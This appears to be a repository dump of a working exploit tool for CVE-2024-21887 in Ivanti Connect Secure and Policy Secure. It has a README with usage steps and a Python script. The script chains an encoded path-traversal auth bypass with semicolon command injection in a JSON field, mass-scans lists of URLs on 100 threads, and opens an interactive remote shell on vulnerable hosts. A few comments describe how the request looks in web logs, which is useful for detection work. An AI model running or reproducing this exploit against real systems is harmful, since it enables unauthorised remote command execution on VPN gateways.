├── requirements.txt ├── README.md └── exploit.py /requirements.txt: -------------------------------------------------------------------------------- 1 | alive_progress==3.1.4 2 | prompt_toolkit==3.0.36 3 | requests==2.25.1 4 | rich==13.7.0 5 | urllib3==1.26.12 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 🚨 CVE-2024-21887 Exploit Tool 🛠️ 2 | 3 | A robust tool for detecting and exploiting the CVE-2024-21887 vulnerability in Ivanti Connect Secure and Policy Secure systems. 4 | 5 | ## 📝 Description 6 | 7 | CVE-2024-21887 is a critical command injection vulnerability, allowing authenticated admins to execute arbitrary commands. Note that `exploit.py` itself sends no credentials: it reaches the endpoint through percent-encoded `..` segments under `/api/v1/totp/user-backup-code/`, so a request for that path containing a traversal sequence is the pattern to look for in web logs. This tool aids in identifying and interacting with affected systems. 8 | 9 | ## 🚀 Features 10 | 11 | - **Single URL Scan**: Pinpoint focus on a single target. 12 | - **Bulk Scanning**: Analyze multiple URLs from a file. 13 | - **Thread Control**: Customize concurrent scanning with thread options. 14 | - **Output Logging**: Save identified vulnerable URLs to a file. 15 | 16 | ## 📚 How to Use 17 | 18 | 1. Install dependencies: `pip install -r requirements.txt` 19 | 2. Run the tool: 20 | - Single URL: `python exploit.py -u <url>` 21 | - Bulk scan: `python exploit.py -f <file>` 22 | - With threads: `python exploit.py -f <file> -t <threads>` 23 | - Save output: `python exploit.py -f <file> -o <output>` 24 | 25 | ⚠️ **Disclaimer**: This tool is provided for educational and ethical testing purposes only. I am not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing any system that you do not own. 
# /exploit.py
import json
import urllib3
import requests
import argparse

from rich.console import Console
from alive_progress import alive_bar
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed

# Silences urllib3's InsecureRequestWarning for the whole process. Every
# request below is sent with verify=False, so certificate problems are never
# surfaced to the operator.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class CVE_2024_21887:
    """Send the CVE-2024-21887 probe request to one base URL and report the reply.

    Holds the target base URL, a rich Console for output and one
    requests.Session reused for every request to that target.
    """

    def __init__(self, base_url):
        """Store the base URL and create the console and HTTP session."""
        self.base_url = base_url
        self.console = Console()
        self.session = requests.Session()
        # trust_env=False: requests ignores proxy settings and .netrc
        # credentials taken from the environment.
        self.session.trust_env = False

    def send_backup_code_request(self, type_value="id"):
        """POST ``{"type": ";<type_value>;"}`` and return the reply's ``error`` field.

        The request path starts under ``/api/v1/totp/user-backup-code/``,
        climbs two levels with percent-encoded ``..`` segments (``%2E%2E``)
        and ends at
        ``/system/maintenance/archiving/cloud-server-test-connection``.
        No credentials, cookies or extra headers are set anywhere in this
        class. For log review, the encoded traversal in the path together
        with a JSON ``type`` value wrapped in semicolons is what this request
        looks like on the wire.

        Returns the value of ``error`` when the response Content-Type is
        exactly ``application/json`` and the parsed body contains that key.
        Returns ``None`` otherwise, including when a ``requests`` exception
        is raised.
        """
        # The caller-supplied value is wrapped in ';' on both sides before it
        # is placed in the "type" field.
        data = {"type": f";{type_value};"}
        url = f"{self.base_url}/api/v1/totp/user-backup-code/%2E%2E/%2E%2E/system/maintenance/archiving/cloud-server-test-connection"
        try:
            # verify=False: the server certificate is not checked.
            response = self.session.post(url, json=data, verify=False, timeout=10)
            # Exact string comparison: a header such as
            # "application/json; charset=utf-8" does not match and yields None.
            if response.headers.get("Content-Type") == "application/json":
                try:
                    response_json = response.json()
                    if "error" in response_json:
                        return response_json["error"]
                except json.JSONDecodeError:
                    # Body was labelled JSON but did not parse; treated as no result.
                    pass
            return None
        except requests.exceptions.RequestException as e:
            # Connection errors, timeouts and the like are swallowed; the
            # method then falls off the end and returns None implicitly.
            pass

    def check_vulnerability(self):
        """Send the default probe (``type_value="id"``) and print a line on a hit.

        Returns whatever send_backup_code_request returned, so the result is
        falsy when nothing came back.

        NOTE(review): any truthy ``error`` value is reported as "vulnerable";
        the content is not inspected, so a generic JSON error response would
        be reported the same way. Confirm a result against the appliance's
        version and patch level.
        """
        error_message = self.send_backup_code_request()
        if error_message:
            self.console.print(
                f"[bold green][+] {self.base_url} is vulnerable - [/bold green][bold yellow]{error_message}[/bold yellow]"
            )

        return error_message

    def interactive_shell(self):
        """Run a prompt loop that forwards each input line to the target.

        "exit" leaves the loop and "clear" clears the console (both matched
        case-insensitively). Any other line is passed unchanged as
        ``type_value`` to send_backup_code_request, and a truthy result is
        printed. Ctrl-C also leaves the loop.
        """
        # History is kept in memory only; nothing is written to disk here.
        session = PromptSession(InMemoryHistory())
        self.console.print(
            f"[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]"
        )
        while True:
            try:
                cmd = session.prompt(HTML("# "))
                # Lower-casing is used for matching only; the original text
                # is what gets sent in the default case.
                match cmd.lower():
                    case "exit":
                        break
                    case "clear":
                        self.console.clear()
                    case _:
                        response = self.send_backup_code_request(cmd)
                        if response:
                            self.console.print(response)
            except KeyboardInterrupt:
                break


def process_url(url, output_file=None):
    """Check one URL and record it when it is reported vulnerable.

    Returns ``url`` on a hit, after appending it to ``output_file`` when one
    is given, and ``None`` otherwise.
    """
    scanner = CVE_2024_21887(url)
    if scanner.check_vulnerability():
        if output_file:
            # main() calls this from worker threads; the append is not
            # guarded by a lock.
            with open(output_file, "a") as outfile:
                outfile.write(url + "\n")
        return url
    return None


def main():
    """Parse the command line and run single-URL or bulk mode.

    With ``-u`` the URL is checked and, on a hit, the interactive prompt
    starts. With ``-f`` every line of the file is checked on a thread pool.
    With neither option the help text is printed.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2024-21887 Exploit Script. This script is designed to detect and interact with systems vulnerable to CVE-2024-21887."
    )
    parser.add_argument(
        "-u",
        "--url",
        help="Specify a single URL to scan. Use this mode for a focused scan on one target.",
    )
    parser.add_argument(
        "-f",
        "--file",
        help="Specify a file path containing a list of URLs for bulk scanning. Each URL should be on a new line.",
    )
    parser.add_argument(
        "-t",
        "--threads",
        type=int,
        default=100,
        help="Set the number of concurrent threads for bulk scanning. Default is 100.",
    )
    parser.add_argument(
        "-o",
        "--output",
        help="Specify a file path to save the URLs that are found to be vulnerable. Results are appended to this file in real time.",
    )

    args = parser.parse_args()

    # The cases are tested in order, so -u takes precedence when both -u and
    # -f are given.
    match args:
        case args if args.url:
            scanner = CVE_2024_21887(args.url)
            if scanner.check_vulnerability():
                scanner.interactive_shell()

        case args if args.file:
            with open(args.file) as file:
                # splitlines() keeps empty strings, so blank lines in the
                # file are submitted as URLs too.
                urls = file.read().splitlines()
            with alive_bar(len(urls), enrich_print=False) as bar:
                with ThreadPoolExecutor(max_workers=args.threads) as executor:
                    futures = [
                        executor.submit(process_url, url, args.output)
                        for url in urls
                    ]
                    for future in as_completed(futures):
                        # result() re-raises any exception process_url
                        # raised; the return value itself is discarded.
                        future.result()
                        bar()
            if args.output:
                # Printed whenever -o was given, whether or not anything was written.
                print(f"Vulnerable URLs saved to {args.output}")

        case _:
            parser.print_help()


if __name__ == "__main__":
    main()